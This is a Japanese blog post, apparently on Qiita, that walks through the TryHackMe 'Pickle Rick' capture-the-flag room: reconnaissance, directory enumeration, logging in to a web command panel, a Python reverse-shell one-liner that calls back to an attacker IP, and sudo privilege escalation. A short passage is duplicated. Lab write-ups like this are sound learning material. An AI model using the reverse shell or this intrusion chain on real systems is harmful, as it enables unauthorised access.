1
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

TryHackMe Writeup:Pickle Rick

Posted at

最初に

image.png

Pickle Rickってなんだろうと思ってWikipediaで調べてみましたが、カオスでした(笑)

「Pickle Rick」は、アダルトスイムのアニメテレビシリーズ「リック・アンド・モーティ」の第3シーズンの第3話です。ジェシカ・ガオが脚本を書き、アンソニー・チュンが監督したこのエピソードは、2017年8月6日に初公開されました。ストーリーは、風変わりな科学者リック・サンチェスが家族療法のセッションに出席するのを避けるために自分自身をピクルスに変えるというものです。

引用元:https://en.wikipedia.org/wiki/Pickle_Rick をGoogle翻訳

まず自分が試したことで上手くいってはないですが、いろいろ自分が試行錯誤したことを記載しています
その後、Writeupをみて取り組んだことで先人たちのWriteupをみて解答を見つけた方法について記載しています。

なので、特段興味がなければWriteupをみて取り組んだことだけ見てもらえたらと思います

(備忘録で自分が試したことは記載しているのと、時系列で並べるためにこのようにしています)

自分が試したこと

nmapしたところ、ポート80番と22番が開いています

image.png

HTTPで接続してみるとWebページがみれます。
個人あてのメッセージをWebページとして公開するとはなかなかな度胸ですね(笑)
image.png

念のためソースページを見てみると、ユーザー名のメモが。。
image.png

さっそくhydraでパスワードクラッキングしようとしたらapしたところ、ポート80番と22番が開いています

image.png

HTTPで接続してみるとWebページがみれます。
個人あてのメッセージをWebページとして公開するとはなかなかな度胸ですね(笑)
image.png

念のためソースページを見てみると、ユーザー名のメモが。。
image.png

さっそくhydraでパスワードクラッキングしようとしたら、パスワード認証を受け付けていないとのエラーがでてきました。
つまり鍵認証のみということでしょうか
image.png

普通にSSH接続を試みてもダメでした。。。
image.png

Burpsuitで見てみると、Webページの画像を/assetsからとってきていることがわかった(キャプチャは取り損ねた、、)

ちなみにgobusterしてみても、めぼしいところはassetsしかなかったです
image.png

/assetsをブラウザで見てみるといくつかのファイルと画像・GIFがありました。。
あんまり元のアニメを知らないから何とも言えないです、、、
image.png

JPEG画像についてはステガノグラフィーされているか確認したのですが、されていないようでした
image.png

GIFは以下のサイトを使ってフレームに分割してみたが、各フレームの画像に違和感はない。。
https://ezgif.com/split

image.png

抽出した画像をsetgseekしてみたが

picklerick.gifをフレーム分割してstegseekした結果の一部
image.png

fail.gifをフレーム分割してstegseekした結果の一部
image.png

Apache 2.4.41を使っていることから、何か脆弱性攻撃ができないかsearchsploitで調べてみたが、ヒットせず。。。

image.png

Writeupをみて取り組んだこと

わからなくなってしまったので、以下のWriteupをみました
https://fr33s0ul.tech/pickle-rick/

以下の流れで整理していきます

  1. Recon (偵察)
  2. Enumeration (列挙)
  3. GainingAccess (侵入)
  4. PrivEsc (権限昇格)

Recon (偵察)

このあたりは、自分が試したことを見ていただければと思います。。

Enumeration (列挙)

dirbで隠しコマンドを探します
こっちの方がgobusterよりコマンド簡単だし、検出率高いし、実行時間も短くて、いいですね~
image.png

robots.txtを見てみると、文字列がありました。
これは本来のrobots.txtのファイルではなさそうですね
image.png

/assetsは見ていましたし、index.htmlは最初のページなので、ほかはなさそうです

WriteupにはNiktoでも調査していたので、やってみます。
Niktoの説明は以下の記事がわかりやすかったです。
https://security-tech-lab.com/2023/04/07/nikto-option-security/

image.png

login.phpがありますね、、、

GainingAccess (侵入)

というわけで、ログインしてみます!
最初にアクセスしたページのソースにあったユーザー名のメモとrobots.txtの文字列を入れてみるとログインできました!

image.png

whoamiとCommandsのところ入力してみると、www-dataと返ってきました。

image.png

ls -laしてみると、いくつかファイルがありますね
image.png

cat clue.txtをしてみると失敗したみたい
(assetsにあったGIFはここで使われるのか、、、、)
image.png

What is the first ingredient that Rick needs?

ブラウザからはアクセスできるみたいです!

image.png

What is the second ingredient in Rick’s potion?

Python3が使えるみたいなので、リバースシェルをはってみます
image.png

リバースシェルのチートシートを参考に以下のコマンドを実行すると、、、
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#perl

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.1.106",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

うまくいきました!
image.png

ここならcatもききますね
image.png

PrivEsc (権限昇格)

最後は権限昇格ということで、現在のユーザー(www-data)で何がroot権限でできるのかを確認したところ、なんでもできるみたい(笑)

image.png

What is the last and final ingredient?

root権限でなんでも実行はできますが、/rootにはアクセスできないみたいです

image.png

sudo bash -iを実行してbashをroot権限で実行させることで、

そうすると、rootフォルダーにもアクセスでき、最後のフラグも確認できました
image.png

最後に

今回学んだことは以下3つでした!

  • Enumeration (列挙) は複数ツールを使って行うことで抜け漏れがなくなる
  • リバースシェルのチートシートは有能
  • root権限でbashが使えれば、なんでもできそう(言い過ぎ)
1
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
1
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?